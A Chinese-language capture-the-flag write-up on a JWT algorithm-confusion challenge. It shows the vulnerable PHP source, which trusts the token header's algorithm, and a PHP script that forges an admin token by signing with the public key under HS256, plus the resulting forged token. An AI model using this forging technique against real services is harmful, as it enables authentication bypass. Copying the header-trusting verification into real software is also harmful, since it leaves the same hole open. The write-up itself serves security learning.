1、题目提示:有些JWT库支持多种密码算法进行签名、验签。若目标使用非对称密码算法时,有时攻击者可以获取到公钥,此时可通过修改JWT头部的签名算法,将非对称密码算法改为对称密码算法,从而达到攻击者目的。
2、打开题目看到题目给的源码,源码如下,
<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;
class JWTHelper {
public static function encode($payload=array(), $key='', $alg='HS256') {
return JWT::encode($payload, $key, $alg);
}
public static function decode($token, $key, $alg='HS256') {
try{
$header = JWTHelper::getHeader($token);
$algs = array_merge(array($header->alg, $alg));
return JWT::decode($token, $key, $algs);
} catch(Exception $e){
return false;
}
}
public static function getHeader($jwt) {
$tks = explode('.', $jwt);
list($headb64, $bodyb64, $cryptob64) = $tks;
$header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
return $header;
}
}
$FLAG = getenv("FLAG");
$PRIVATE_KEY = file_get_contents("/privatekey.pem");
$PUBLIC_KEY = file_get_contents("./publickey.pem");
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (!empty($_POST['username']) && !empty($_POST['password'])) {
$token = "";
if($_POST['username'] === 'admin' && $_POST['password'] === $FLAG){
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'admin',
);
$token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
} else {
$jwt_payload = array(
'username' => $_POST['username'],
'role'=> 'guest',
);
$token = JWTHelper::encode($jwt_payload, $PRIVATE_KEY, 'RS256');
}
@setcookie("token", $token, time()+1800);
header("Location: /index.php");
exit();
} else {
@setcookie("token", "");
header("Location: /index.php");
exit();
}
} else {
if(!empty($_COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false) {
$obj = JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY);
if ($obj->role === 'admin') {
** echo $FLAG;
}
} else {
show_source(__FILE__);
}
}
?>
3、对源码分析,进行代码审计,要想执行“echo $FLAG; ”需要执行上述源码中用“**”标注的代码。分析代码逻辑结构,需要“if($SERVER['REQUEST_METHOD']=== 'POST')”不成立, 并且“if(!empty($COOKIE['token']) && JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false)”成立,及可以构造为 “GET ,token不为空,JWTHelper::decode()正确。”分析class JWTHelper,在该类中,decode()、encode()默认的加密解密方式都为“HS256”。根据题目的提示,实验环境中token采用的“RS256“,最后解题可以采用”HS256“,题目提示在类中安全可以实现。
思路为:
1)获取到RS256加密的token,
2)使用提供的PUBLIC_KEY进行解密,验证PUBLIC_KEY的格式,
3)再用PUBLIC_KEY采用HS256进行加密payload构造token,JWTHelper::decode($_COOKIE['token'], $PUBLIC_KEY) != false才成立。
4、打开题目可以看到,一个登陆界面与publickey.pem的链接,点解publickey.pem既可以获取到源码中使用的PUBLIC_KEY
-----BEGIN PUBLIC KEY-----
MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA106BSOxuqDXOR6jFWZXr
EKR8S5xLumTAKO1VVPpRItyRIOJIssCorOMzj67V4yYpbH/BX5owqZa9RtR0Jqqf
alS5/65drrJojMrNNrff49M/O9UyawaXoD21kihPU6Me27Cfzg7TGJ5eLHwQONWu
Ljt9wAAisnFXqkxYFAwf2Eoi9DNpeIMgYftvm09jya83ntyK5cuTpCmnK2JXF2UF
5vwv5C97CraOppA3gtHSog4qmPuM5Sj4U8ryESo1Tw4XmvAROhZs8zHPreTo5PcF
gDwVsuKxKn6VsVZwoqC/IVix/M9dhlagpHXH5CImSbIMCNSKwu0214fYPxsbypB0
jQIDAQAB
-----END PUBLIC KEY-----
注意:后面再使用PUBLIC_KEY做验证的时候,一定要下载publickey.pem文件,通过文件读取获取key值,不要直接copy值,个人因为copy值,一直出错,浪费的一天时间,最后通过文件读取才解决。另外需要注意的是,每次打开实验环境的publickey.pem值都不相同,一定要用自己当前环境中的publickey.pem文件。
5、随便填入用户名密码,提交,输出token格式为:
eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6Imd1ZXN0In0.JH68YrFe3jJGorwxygEeu6f7hBY99Mdkw8c-8JqTe7GYRb8Pa1gpeVJ0UfN6TBirqDKd22SzwlwsnWamFMEAfTq-6-swM7QzmWti6p10sG-AdZr5-R9G-XEEg3XkrTuoHgi09-S0oNsNzlMmEk2-bdPiN0X8DbSWiUIILPkIARqwJmP97OiTo9vPMPPOc3J_RMM1MPUp8quiwrcpzBlE01PvcG6kDKLz3FHNf7MGStQK-Wcfj_27IZThIyZT06pONuhKmVBVbkbkjzy8AZvKKGUlCuIJM3arGtyryLBZq7X1S2Z0fkHhtPkRyw4w44pVQTOgv1qQMILbv4a7K4Hv6w
通过分析源码知道为RS256加密,可以自己写脚本进行解密,或者在https://jwt.io/上解密。因为publickey.pem中文件内容的问题,python脚本一直报错,最后只好搭了一个jwt的php环境进行测试。
虽然不知道public key、private key但是可以看到header与payload内容。
6、php-jwt环境搭建
1)php根据自己选择安装,个人环境为php 7.3.1
2)composer安装,Packagist / Composer 中国全量镜像:https://pkg.phpcomposer.com/
3)安装 Firebase\JWT\,php firebase/php-jwt token验证https://blog.csdn.net/cjs5202001/article/details/80228937
4)jwt使用方法,Composer 使用 JWT 生成 TOKEN 实例:https://learnku.com/articles/9122/composer-uses-jwt-to-generate-token-instances
环境php源码,
<?php
require __DIR__ . '/vendor/autoload.php';
use \Firebase\JWT\JWT;
class JWTHelper {
public static function encode($payload=array(), $key='', $alg='HS256') {
return JWT::encode($payload, $key, $alg);
}
public static function decode($token, $key, $alg='HS256') {
try{
$header = JWTHelper::getHeader($token);
$algs = array_merge(array($header->alg, $alg));
return JWT::decode($token, $key, $algs);
} catch(Exception $e){
return false;
}
}
public static function getHeader($jwt) {
$tks = explode('.', $jwt);
list($headb64, $bodyb64, $cryptob64) = $tks;
$header = JWT::jsonDecode(JWT::urlsafeB64Decode($headb64));
return $header;
}
}
$FLAG = "flag";
$PRIVATE_KEY = "private";
$PUBLIC_KEY = file_get_contents("./publickey.pem");
//test decoder token with PUBLIC_KEY RS256测试使用publickey.pem是否可以正常进行RS256解密
$encoder_rsa="eyJ0eXAiOiJKV1QiLCJhbGciOiJSUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicm9sZSI6Imd1ZXN0In0.JH68YrFe3jJGorwxygEeu6f7hBY99Mdkw8c-8JqTe7GYRb8Pa1gpeVJ0UfN6TBirqDKd22SzwlwsnWamFMEAfTq-6-swM7QzmWti6p10sG-AdZr5-R9G-XEEg3XkrTuoHgi09-S0oNsNzlMmEk2-bdPiN0X8DbSWiUIILPkIARqwJmP97OiTo9vPMPPOc3J_RMM1MPUp8quiwrcpzBlE01PvcG6kDKLz3FHNf7MGStQK-Wcfj_27IZThIyZT06pONuhKmVBVbkbkjzy8AZvKKGUlCuIJM3arGtyryLBZq7X1S2Z0fkHhtPkRyw4w44pVQTOgv1qQMILbv4a7K4Hv6w";
$decoder =JWTHelper::decode($encoder_rsa, $PUBLIC_KEY,'RS256');
var_dump($decoder);
//var_dump($PUBLIC_KEY);
//test endoder with HS256
$payload=array("username"=>"admin", "password"=>"123456", "role"=>"admin");
$encoder=JWT::encode($payload, $PUBLIC_KEY);
var_dump($encoder);//输出token值
//验证是否能正确读取到flag值
if(!empty($encoder) && JWTHelper::decode($encoder, $PUBLIC_KEY) != false)
{
$obj = JWTHelper::decode($encoder, $PUBLIC_KEY);
if ($obj->role === 'admin') {
echo $FLAG;
}
else{
echo "admin error";
}
}
else{
echo "error1";
7、将上面验证没有问题的HS256加密的token使用burpsuit进行抓包,修改为GET方式,修改token为:
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwicGFzc3dvcmQiOiIxMjM0NTYiLCJyb2xlIjoiYWRtaW4ifQ.BTwXQlsyIitbR9QlcwM2pxklZLbizFNVgfl7wj7AVzg
8、go下获取到flag如下:
参考网址:
2、Composer 使用 JWT 生成 TOKEN 实例:https://learnku.com/articles/9122/composer-uses-jwt-to-generate-token-instances
3、Packagist / Composer 中国全量镜像:https://pkg.phpcomposer.com/
4、https://www.jianshu.com/p/b2850d4e8361
5、php firebase/php-jwt token验证https://blog.csdn.net/cjs5202001/article/details/80228937